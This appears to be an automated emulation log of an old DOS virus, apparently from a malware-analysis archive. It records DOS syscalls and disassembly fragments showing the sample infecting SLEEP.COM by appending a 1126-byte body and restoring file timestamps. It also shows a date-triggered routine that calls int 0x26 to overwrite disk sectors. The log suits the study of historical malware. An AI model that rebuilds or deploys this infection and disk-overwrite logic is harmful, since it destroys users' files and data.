2018-12-25T12:21:16.35595144Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.358749981Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.370161347Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.372122979Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.381074121Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.384991647Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.387851203Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.390724139Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.39286412Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.39528571Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.410977004Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.414732742Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.417292135Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.426219673Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.44659697Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.449036971Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.453565314Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.333587855Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.337071726Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.340280936Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.344610659Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.346096335Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.358158713Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.37167063Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.38015861Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.382649331Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.408790548Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.411646786Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.419170938Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.422351635Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.425238632Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.428719881Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.430030338Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.432380262Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.442702694Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.44571136Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.44795071Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.458497367Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.4706447Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.473447025Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.482100676Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.491917678Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.495178968Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.510254744Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.513893782Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.52220861Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.52754127Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.531712988Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.535311834Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.547998483Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.550769681Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.560622349Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.563284515Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.565073572Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.573932629Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.585441319Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.589232145Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.597399179Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.604373451Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.607655812Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.616049473Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.618392975Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.627316466Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.630896384Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.634201873Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.638356777Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.640796799Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.643621809Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.653019664Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.655566311Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.658445729Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.666938752Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.678103915Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.680965315Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.685742519Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.542214913Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.544686831Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.548658082Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.553616676Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.555292584Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.569162524Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.582867958Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.59052268Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.594240182Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.61496433Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.617363335Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.626383334Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.629519483Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.63278632Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.636088007Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.638396424Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.641988088Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.651881878Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.65565482Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.657398868Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.667453886Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.679201953Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.682963554Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.690867769Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.706472995Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.709096352Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.717212126Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.71919445Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.742971732Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.746636192Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.750451599Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.754151344Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.755906292Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.75876972Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.769425903Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.771626857Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.774107789Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.785268815Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.797086318Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.800506465Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.809181396Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.817625699Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.820476941Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.833686666Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.836163598Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.844065955Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.848691295Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.851972595Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.854985558Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.856676315Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.860778655Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.87042177Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.873031404Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.876185122Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.885430012Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.89663059Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:16.900563263Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:16.905345513Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.738949219Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.741739788Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.745048366Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.749358624Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.750278085Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.757887586Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.765115258Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.772020668Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.776277068Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.796942896Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.799040957Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.806954961Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:16.81438276Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.81719346Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:16.820988201Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:16.823279672Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.826120508Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:16.843608602Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.849570515Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:16.851296951Z 62 PC: 12d11 | Close file
2018-12-25T12:21:16.860321991Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:16.871730881Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:16.875131016Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:16.882590431Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:16.892331041Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:16.894688217Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:16.9058011Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:16.914090798Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:16.921765875Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:16.925508276Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:16.929715348Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:16.934124109Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:16.936305757Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.940089662Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:16.953420218Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:16.962204689Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:16.964544295Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:16.979109186Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:16.991377012Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:16.995649074Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.005730635Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.014568458Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.017110826Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.030325891Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.032578017Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.041192622Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.045600528Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.048868911Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.052123037Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.054850612Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.057219934Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.067118245Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.070643105Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.072691908Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.338362251Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.414569694Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:17.417882208Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.42267887Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:16.91924194Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:16.921989701Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:16.926398849Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:16.931173198Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:16.93283124Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:16.941406718Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.949474259Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:16.956435139Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:16.959518612Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:16.979603517Z 62 PC: 12cac | Close file
2018-12-25T12:21:16.982114026Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:16.990569889Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.000568419Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.004596791Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.008183364Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.010381281Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.013202908Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.023019916Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.026030658Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.027278587Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.035809868Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.052578278Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.057106588Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.065442541Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.077344219Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.081011041Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.338857664Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.34237535Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.350324492Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.353483238Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.358138031Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.361791818Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.363861401Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.367255577Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.414125279Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.417421149Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.419225111Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.428371684Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.439343145Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.442737099Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.450940105Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.465613616Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.468180522Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.480331166Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.482437268Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.490565463Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.494420146Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.497431764Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.500639239Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.505362581Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.508568549Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.518528048Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.521792035Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.523603673Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.532469851Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.544237852Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:17.547550357Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.553205162Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.151760749Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
